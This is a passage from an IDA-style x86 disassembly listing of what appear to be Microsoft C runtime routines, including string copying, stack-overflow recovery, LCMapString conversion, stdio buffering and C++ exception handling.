; ---------------------------------------------------------------------------
loc_41C009: ; CODE XREF: sub_41BF80+A6�j
; sub_41BF80+C0�j
mov [edi], edx
add edi, 4
loc_41C00E: ; CODE XREF: sub_41BF80+6F�j
; sub_41BF80+87�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_41C009
test dl, dl
jz short loc_41C060
test dh, dh
jz short loc_41C057
test edx, 0FF0000h
jz short loc_41C04A
test edx, 0FF000000h
jz short loc_41C042
jmp short loc_41C009
; ---------------------------------------------------------------------------
loc_41C042: ; CODE XREF: sub_41BF80+BE�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C04A: ; CODE XREF: sub_41BF80+B6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C057: ; CODE XREF: sub_41BF80+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C060: ; CODE XREF: sub_41BF80+78�j
; sub_41BF80+AA�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_41BF80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C068 proc near ; CODE XREF: sub_417456+A5�p
; sub_419255+4DC�p ...
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 4
pop eax
call sub_416B20
mov ebx, esp
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call dword_4221A0 ; VirtualQuery
test eax, eax
jz short loc_41C0FD
mov edi, [ebp+var_20]
lea eax, [ebp+var_48]
push eax
call dword_422074 ; GetSystemInfo
mov eax, [ebp+var_44]
lea esi, [eax-1]
not esi
and esi, ebx
sub esi, eax
mov [ebp+var_4], eax
mov eax, dword_481164
mov ecx, eax
dec ecx
neg ecx
sbb ecx, ecx
and ecx, 0FFFF1000h
add ecx, 11000h
add ecx, edi
cmp esi, ecx
jb short loc_41C0FD
cmp eax, 1
jz short loc_41C115
mov ebx, edi
mov edi, 1000h
loc_41C0D2: ; CODE XREF: sub_41C068+81�j
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call dword_4221A0 ; VirtualQuery
test eax, eax
jz short loc_41C0FD
add ebx, [ebp+var_18]
test [ebp+var_14], edi
jz short loc_41C0D2
test [ebp+var_F], 1
mov ebx, [ebp+var_24]
jz short loc_41C0F9
xor eax, eax
inc eax
jmp short loc_41C131
; ---------------------------------------------------------------------------
loc_41C0F9: ; CODE XREF: sub_41C068+8A�j
cmp esi, ebx
jnb short loc_41C101
loc_41C0FD: ; CODE XREF: sub_41C068+22�j
; sub_41C068+5C�j ...
xor eax, eax
jmp short loc_41C131
; ---------------------------------------------------------------------------
loc_41C101: ; CODE XREF: sub_41C068+93�j
push 4
push edi
push [ebp+var_4]
push ebx
call dword_422194 ; VirtualAlloc
mov eax, dword_481164
jmp short loc_41C117
; ---------------------------------------------------------------------------
loc_41C115: ; CODE XREF: sub_41C068+61�j
mov ebx, esi
loc_41C117: ; CODE XREF: sub_41C068+AB�j
dec eax
neg eax
sbb eax, eax
and eax, 103h
lea ecx, [ebp+var_8]
push ecx
inc eax
push eax
push [ebp+var_4]
push ebx
call dword_42219C ; VirtualProtect
loc_41C131: ; CODE XREF: sub_41C068+8F�j
; sub_41C068+97�j
lea esp, [ebp-54h]
pop edi
pop esi
pop ebx
leave
retn
sub_41C068 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C139 proc near ; CODE XREF: sub_417456+6F�p
; sub_417456+E5�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push 38h
push offset stru_42C158
call __SEH_prolog
xor ebx, ebx
cmp dword_48131C, ebx
jnz short loc_41C187
push ebx
push ebx
xor esi, esi
inc esi
push esi
push offset dword_42C150
push 100h
push ebx
call dword_4221A8 ; LCMapStringW
test eax, eax
jz short loc_41C172
mov dword_48131C, esi
jmp short loc_41C187
; ---------------------------------------------------------------------------
loc_41C172: ; CODE XREF: sub_41C139+2F�j
call dword_422004 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41C187
mov dword_48131C, 2
loc_41C187: ; CODE XREF: sub_41C139+14�j
; sub_41C139+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_41C1A7
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_41C192: ; CODE XREF: sub_41C139+61�j
dec ecx
cmp [eax], bl
jz short loc_41C19F
inc eax
cmp ecx, ebx
jnz short loc_41C192
or ecx, 0FFFFFFFFh
loc_41C19F: ; CODE XREF: sub_41C139+5C�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_41C1A7: ; CODE XREF: sub_41C139+51�j
mov eax, dword_48131C
cmp eax, 2
jz loc_41C391
cmp eax, ebx
jz loc_41C391
cmp eax, 1
jnz loc_41C3C4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], ebx
mov [ebp+var_24], ebx
cmp [ebp+arg_18], ebx
jnz short loc_41C1DE
mov eax, dword_481488
mov [ebp+arg_18], eax
loc_41C1DE: ; CODE XREF: sub_41C139+9B�j
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
xor eax, eax
cmp [ebp+arg_1C], ebx
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call dword_4220D4 ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_28], esi
cmp esi, ebx
jz loc_41C3C4
mov [ebp+ms_exc.disabled], 1
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B20
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41C24A
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41C068
xor ebx, ebx
mov [ebp+var_2C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_41C24A: ; CODE XREF: sub_41C139+F4�j
cmp [ebp+var_2C], ebx
jnz short loc_41C26B
lea eax, [esi+esi]
push eax
call sub_416DAF
pop ecx
mov [ebp+var_2C], eax
cmp eax, ebx
jz loc_41C3C4
mov [ebp+var_20], 1
loc_41C26B: ; CODE XREF: sub_41C139+114�j
push esi
push [ebp+var_2C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_4220D4 ; MultiByteToWideChar
test eax, eax
jz loc_41C36E
push ebx
push ebx
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A8 ; LCMapStringW
mov edi, eax
mov [ebp+var_1C], edi
cmp edi, ebx
jz loc_41C36E
test byte ptr [ebp+arg_4+1], 4
jz short loc_41C2DA
cmp [ebp+arg_14], ebx
jz loc_41C36E
cmp edi, [ebp+arg_14]
jg loc_41C36E
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A8 ; LCMapStringW
jmp loc_41C36E
; ---------------------------------------------------------------------------
loc_41C2DA: ; CODE XREF: sub_41C139+172�j
mov [ebp+ms_exc.disabled], 2
lea eax, [edi+edi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B20
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_30], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41C318
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41C068
xor ebx, ebx
mov [ebp+var_30], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_41C318: ; CODE XREF: sub_41C139+1C2�j
cmp [ebp+var_30], ebx
jnz short loc_41C335
lea eax, [edi+edi]
push eax
call sub_416DAF
pop ecx
mov [ebp+var_30], eax
cmp eax, ebx
jz short loc_41C36E
mov [ebp+var_24], 1
loc_41C335: ; CODE XREF: sub_41C139+1E2�j
push edi
push [ebp+var_30]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A8 ; LCMapStringW
test eax, eax
jz short loc_41C36E
push ebx
push ebx
cmp [ebp+arg_14], ebx
jnz short loc_41C358
push ebx
push ebx
jmp short loc_41C35E
; ---------------------------------------------------------------------------
loc_41C358: ; CODE XREF: sub_41C139+219�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_41C35E: ; CODE XREF: sub_41C139+21D�j
push edi
push [ebp+var_30]
push ebx
push [ebp+arg_18]
call dword_4220D8 ; WideCharToMultiByte
mov edi, eax
loc_41C36E: ; CODE XREF: sub_41C139+149�j
; sub_41C139+168�j ...
cmp [ebp+var_24], ebx
jz short loc_41C37C
push [ebp+var_30]
call sub_416C97
pop ecx
loc_41C37C: ; CODE XREF: sub_41C139+238�j
cmp [ebp+var_20], ebx
jz short loc_41C38A
push [ebp+var_2C]
call sub_416C97
pop ecx
loc_41C38A: ; CODE XREF: sub_41C139+246�j
mov eax, edi
jmp loc_41C4EC
; ---------------------------------------------------------------------------
loc_41C391: ; CODE XREF: sub_41C139+76�j
; sub_41C139+7E�j
mov [ebp+var_34], ebx
xor edi, edi
mov [ebp+var_38], ebx
cmp [ebp+arg_0], ebx
jnz short loc_41C3A6
mov eax, dword_481478
mov [ebp+arg_0], eax
loc_41C3A6: ; CODE XREF: sub_41C139+263�j
cmp [ebp+arg_18], ebx
jnz short loc_41C3B3
mov eax, dword_481488
mov [ebp+arg_18], eax
loc_41C3B3: ; CODE XREF: sub_41C139+270�j
push [ebp+arg_0]
call sub_42027F
pop ecx
mov [ebp+var_3C], eax
cmp eax, 0FFFFFFFFh
jnz short loc_41C3CB
loc_41C3C4: ; CODE XREF: sub_41C139+87�j
; sub_41C139+CD�j ...
xor eax, eax
jmp loc_41C4EC
; ---------------------------------------------------------------------------
loc_41C3CB: ; CODE XREF: sub_41C139+289�j
cmp eax, [ebp+arg_18]
jz loc_41C4C2
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_4202C8
add esp, 18h
mov [ebp+var_34], eax
cmp eax, ebx
jz short loc_41C3C4
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A4 ; LCMapStringA
mov esi, eax
mov [ebp+var_40], esi
cmp esi, ebx
jz loc_41C4B1
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B20
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_44], edi
push esi
push ebx
push edi
call sub_41E880
add esp, 0Ch
jmp short loc_41C442
; ---------------------------------------------------------------------------
loc_41C432: ; DATA XREF: .text:stru_42C158�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41C436: ; DATA XREF: .text:stru_42C158�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C068
xor ebx, ebx
xor edi, edi
loc_41C442: ; CODE XREF: sub_41C139+2F7�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
cmp edi, ebx
jnz short loc_41C46D
push [ebp+var_40]
call sub_416DAF
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_41C48A
push [ebp+var_40]
push ebx
push edi
call sub_41E880
add esp, 0Ch
mov [ebp+var_38], 1
loc_41C46D: ; CODE XREF: sub_41C139+30F�j
push [ebp+var_40]
push edi
push [ebp+arg_C]
push [ebp+var_34]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A4 ; LCMapStringA
mov [ebp+var_40], eax
cmp eax, ebx
jnz short loc_41C48E
loc_41C48A: ; CODE XREF: sub_41C139+31E�j
xor esi, esi
jmp short loc_41C4B4
; ---------------------------------------------------------------------------
loc_41C48E: ; CODE XREF: sub_41C139+34F�j
push [ebp+arg_14]
push [ebp+arg_10]
lea eax, [ebp+var_40]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_3C]
call sub_4202C8
add esp, 18h
mov esi, eax
neg esi
sbb esi, esi
neg esi
jmp short loc_41C4B4
; ---------------------------------------------------------------------------
loc_41C4B1: ; CODE XREF: sub_41C139+2D0�j
mov esi, [ebp+var_48]
loc_41C4B4: ; CODE XREF: sub_41C139+353�j
; sub_41C139+376�j
cmp [ebp+var_38], ebx
jz short loc_41C4DC
push edi
call sub_416C97
pop ecx
jmp short loc_41C4DC
; ---------------------------------------------------------------------------
loc_41C4C2: ; CODE XREF: sub_41C139+295�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A4 ; LCMapStringA
mov esi, eax
loc_41C4DC: ; CODE XREF: sub_41C139+37E�j
; sub_41C139+387�j
cmp [ebp+var_34], ebx
jz short loc_41C4EA
push [ebp+var_34]
call sub_416C97
pop ecx
loc_41C4EA: ; CODE XREF: sub_41C139+3A6�j
mov eax, esi
loc_41C4EC: ; CODE XREF: sub_41C139+253�j
; sub_41C139+28D�j
lea esp, [ebp-54h]
call __SEH_epilog
retn
sub_41C139 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41C526
loc_41C4F5: ; CODE XREF: sub_41C526:loc_41C52F�j
push 8
push offset stru_42C590
call __SEH_prolog
and dword ptr [ebp-4], 0
push 0
push 1
call sub_4204ED
pop ecx
pop ecx
jmp short loc_41C519
; END OF FUNCTION CHUNK FOR sub_41C526
; =============== S U B R O U T I N E =======================================
sub_41C512 proc near ; DATA XREF: .text:stru_42C590�o
xor eax, eax
inc eax
retn
sub_41C512 endp
; ---------------------------------------------------------------------------
loc_41C516: ; DATA XREF: .text:stru_42C590�o
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_41C526
loc_41C519: ; CODE XREF: sub_41C526-16�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 3
call dword_422040 ; ExitProcess
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_41C526
; =============== S U B R O U T I N E =======================================
sub_41C526 proc near ; CODE XREF: sub_417779+B4�p
; sub_4189AC+76E�p ...
; FUNCTION CHUNK AT 0041C4F5 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0041C519 SIZE 0000000D BYTES
cmp ecx, dword_432A48
jnz short loc_41C52F
retn
; ---------------------------------------------------------------------------
loc_41C52F: ; CODE XREF: sub_41C526+6�j
jmp loc_41C4F5
sub_41C526 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C534 proc near ; CODE XREF: sub_417834+1E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_41E4FD
test eax, eax
pop ecx
jz short loc_41C5B8
cmp esi, offset dword_432658
jnz short loc_41C552
xor eax, eax
jmp short loc_41C55D
; ---------------------------------------------------------------------------
loc_41C552: ; CODE XREF: sub_41C534+18�j
cmp esi, offset dword_432678
jnz short loc_41C5B8
xor eax, eax
inc eax
loc_41C55D: ; CODE XREF: sub_41C534+1C�j
inc dword_481318
test word ptr [esi+0Ch], 10Ch
jnz short loc_41C5B8
push ebx
push edi
lea edi, ds:481320h[eax*4]
cmp dword ptr [edi], 0
mov ebx, 1000h
jnz short loc_41C59E
push ebx
call sub_416DAF
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_41C59E
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_41C5AB
; ---------------------------------------------------------------------------
loc_41C59E: ; CODE XREF: sub_41C534+48�j
; sub_41C534+55�j
mov edi, [edi]
mov [esi+8], edi
mov [esi], edi
mov [esi+18h], ebx
mov [esi+4], ebx
loc_41C5AB: ; CODE XREF: sub_41C534+68�j
or word ptr [esi+0Ch], 1102h
pop edi
xor eax, eax
pop ebx
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C5B8: ; CODE XREF: sub_41C534+10�j
; sub_41C534+24�j ...
xor eax, eax
pop esi
retn
sub_41C534 endp
; =============== S U B R O U T I N E =======================================
sub_41C5BC proc near ; CODE XREF: sub_417834+3A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short locret_41C5E5
push esi
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41C5E4
push esi
call sub_41AE6C
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_41C5E4: ; CODE XREF: sub_41C5BC+10�j
pop esi
locret_41C5E5: ; CODE XREF: sub_41C5BC+5�j
retn
sub_41C5BC endp
; =============== S U B R O U T I N E =======================================
sub_41C5E6 proc near ; CODE XREF: sub_41CBCD+138�p
arg_0 = dword ptr 4
mov eax, [esi+4]
test eax, eax
jz short loc_41C631
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_41C631
mov ecx, [edi+4]
cmp eax, ecx
jz short loc_41C60C
add ecx, 8
push ecx
push edx
call sub_41EDC0
test eax, eax
pop ecx
pop ecx
jnz short loc_41C62E
loc_41C60C: ; CODE XREF: sub_41C5E6+14�j
test byte ptr [edi], 2
jz short loc_41C616
test byte ptr [esi], 8
jz short loc_41C62E
loc_41C616: ; CODE XREF: sub_41C5E6+29�j
mov eax, [esp+arg_0]
mov eax, [eax]
test al, 1
jz short loc_41C625
test byte ptr [esi], 1
jz short loc_41C62E
loc_41C625: ; CODE XREF: sub_41C5E6+38�j
test al, 2
jz short loc_41C631
test byte ptr [esi], 2
jnz short loc_41C631
loc_41C62E: ; CODE XREF: sub_41C5E6+24�j
; sub_41C5E6+2E�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C631: ; CODE XREF: sub_41C5E6+5�j
; sub_41C5E6+D�j ...
xor eax, eax
inc eax
retn
sub_41C5E6 endp
; =============== S U B R O U T I N E =======================================
sub_41C635 proc near ; CODE XREF: sub_41C653+76�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_41C642
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C642: ; CODE XREF: sub_41C635+8�j
call sub_41915F
and dword ptr [eax+80h], 0
jmp sub_41CE51
sub_41C635 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C653 proc near ; CODE XREF: sub_41C783+117�p
; sub_41CAA6+31�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset stru_42C5A0
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
call sub_41915F
add eax, 80h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
loc_41C67B: ; CODE XREF: sub_41C653+8F�j
cmp esi, [ebp+arg_C]
jz short loc_41C6E4
cmp esi, 0FFFFFFFFh
jle short loc_41C68A
cmp esi, [edi+4]
jl short loc_41C68F
loc_41C68A: ; CODE XREF: sub_41C653+30�j
call sub_41CE86
loc_41C68F: ; CODE XREF: sub_41C653+35�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_41C6C0
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_41CEC0
loc_41C6C0: ; CODE XREF: sub_41C653+56�j
and [ebp+ms_exc.disabled], 0
jmp short loc_41C6DF
; ---------------------------------------------------------------------------
loc_41C6C6: ; DATA XREF: .text:0042C5B0�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_41C635
retn
; ---------------------------------------------------------------------------
loc_41C6CF: ; DATA XREF: .text:0042C5B4�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_41C6DF: ; CODE XREF: sub_41C653+71�j
mov [ebp+var_1C], esi
jmp short loc_41C67B
; ---------------------------------------------------------------------------
loc_41C6E4: ; CODE XREF: sub_41C653+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41C706
cmp esi, [ebp+arg_C]
jz short loc_41C6F7
call sub_41CE86
loc_41C6F7: ; CODE XREF: sub_41C653+9D�j
mov [ebx+8], esi
call __SEH_epilog
retn
sub_41C653 endp
; =============== S U B R O U T I N E =======================================
sub_41C700 proc near ; DATA XREF: .text:stru_42C5A0�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_41C700 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C706 proc near ; CODE XREF: sub_41C653+95�p
call sub_41915F
cmp dword ptr [eax+80h], 0
jle short locret_41C720
call sub_41915F
add eax, 80h
dec dword ptr [eax]
locret_41C720: ; CODE XREF: sub_41C706+C�j
retn
sub_41C706 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C721 proc near ; CODE XREF: sub_41C8C6+5C�p
; sub_41CBCD+1A8�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_42C5B8
call __SEH_prolog
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41C74F
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_41C74F
and [ebp+ms_exc.disabled], 0
push ecx
push dword ptr [eax+18h]
call sub_4179BA
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41C74F: ; CODE XREF: sub_41C721+11�j
; sub_41C721+1B�j
call __SEH_epilog
retn
sub_41C721 endp
; =============== S U B R O U T I N E =======================================
sub_41C755 proc near ; DATA XREF: .text:stru_42C5B8�o
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
sub_41C755 endp
; ---------------------------------------------------------------------------
loc_41C75E: ; DATA XREF: .text:stru_42C5B8�o
mov esp, [ebp-18h]
jmp sub_41CE51
; =============== S U B R O U T I N E =======================================
sub_41C766 proc near ; CODE XREF: sub_41C92A+7C�p
; sub_41C92A+FB�p ...
mov edx, [ecx+4]
push esi
mov esi, eax
mov eax, [ecx]
add eax, esi
test edx, edx
jl short loc_41C781
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41C781: ; CODE XREF: sub_41C766+C�j
pop esi
retn
sub_41C766 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C783 proc near ; CODE XREF: sub_41CAA6+52�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0041C8BD SIZE 00000003 BYTES
push 40h
push offset stru_42C5C8
call __SEH_prolog
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_20], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_2C]
push eax
call sub_417B58
pop ecx
pop ecx
mov [ebp+var_30], eax
call sub_41915F
mov eax, [eax+78h]
mov [ebp+var_34], eax
call sub_41915F
mov eax, [eax+7Ch]
mov [ebp+var_38], eax
call sub_41915F
mov [eax+78h], esi
call sub_41915F
mov ecx, [ebp+arg_8]
mov [eax+7Ch], ecx
and [ebp+ms_exc.disabled], 0
mov [ebp+ms_exc.disabled], 1
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_417BED
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp loc_41C8AB
; ---------------------------------------------------------------------------
loc_41C808: ; DATA XREF: .text:0042C5D8�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41C840
mov eax, [ebp+var_3C]
cmp dword ptr [eax+10h], 3
jnz short loc_41C840
mov eax, [ebp+var_3C]
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41C840
mov eax, [ebp+var_3C]
cmp dword ptr [eax+1Ch], 0
mov [ebp+var_40], 1
jz short loc_41C847
loc_41C840: ; CODE XREF: sub_41C783+96�j
; sub_41C783+9F�j ...
mov [ebp+var_40], 0
loc_41C847: ; CODE XREF: sub_41C783+BB�j
mov eax, [ebp+var_40]
retn
; ---------------------------------------------------------------------------
loc_41C84B: ; DATA XREF: .text:0042C5DC�o
mov esp, [ebp+ms_exc.old_esp]
mov ecx, [ebp+arg_C]
mov eax, [ecx+8]
mov [ebp+var_44], eax
mov edi, [ebp+arg_4]
mov eax, [edi+8]
mov [ebp+var_48], eax
mov edx, [ecx+10h]
mov [ebp+var_4C], edx
xor edx, edx
loc_41C868: ; CODE XREF: sub_41C783+13B�j
mov [ebp+var_50], edx
cmp edx, [ecx+0Ch]
jnb short loc_41C894
lea esi, [edx+edx*4]
mov ebx, [ebp+var_4C]
lea esi, [ebx+esi*4]
mov ebx, [esi+4]
cmp eax, ebx
jle short loc_41C8BD
cmp eax, [esi+8]
jg short loc_41C8BD
lea eax, [ebx+1]
mov [ebp+var_48], eax
mov edx, [ebp+var_44]
mov eax, [edx+eax*8]
mov [ebp+var_48], eax
loc_41C894: ; CODE XREF: sub_41C783+EB�j
push eax
push ecx
xor esi, esi
push esi
push edi
call sub_41C653
add esp, 10h
mov [ebp+var_1C], esi
mov [ebp+ms_exc.disabled], esi
mov esi, [ebp+arg_0]
loc_41C8AB: ; CODE XREF: sub_41C783+80�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41C8C6
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41C783 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41C783
loc_41C8BD: ; CODE XREF: sub_41C783+FB�j
; sub_41C783+100�j
inc edx
jmp short loc_41C868
; END OF FUNCTION CHUNK FOR sub_41C783
; =============== S U B R O U T I N E =======================================
sub_41C8C0 proc near ; DATA XREF: .text:stru_42C5C8�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_41C8C0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C8C6 proc near ; CODE XREF: sub_41C783+12C�p
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-30h]
call sub_417BA1
pop ecx
call sub_41915F
mov ecx, [ebp-34h]
mov [eax+78h], ecx
call sub_41915F
mov ecx, [ebp-38h]
mov [eax+7Ch], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_41C929
cmp dword ptr [esi+10h], 3
jnz short locret_41C929
cmp dword ptr [esi+14h], 19930520h
jnz short locret_41C929
cmp dword ptr [ebp-20h], 0
jnz short locret_41C929
cmp dword ptr [ebp-1Ch], 0
jz short locret_41C929
push dword ptr [esi+18h]
call sub_417B80
pop ecx
test eax, eax
jz short locret_41C929
call sub_417D9A
push eax
push esi
call sub_41C721
pop ecx
pop ecx
locret_41C929: ; CODE XREF: sub_41C8C6+2B�j
; sub_41C8C6+31�j ...
retn
sub_41C8C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C92A proc near ; CODE XREF: sub_41CAA6+D�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 8
push offset stru_42C5E0
call __SEH_prolog
mov esi, ecx
mov eax, [ebp+arg_4]
mov edi, edx
mov ebx, [ebp+arg_0]
mov ecx, [eax+4]
test ecx, ecx
jz loc_41CA94
cmp byte ptr [ecx+8], 0
jz loc_41CA94
mov ecx, [eax+8]
test ecx, ecx
jnz short loc_41C966
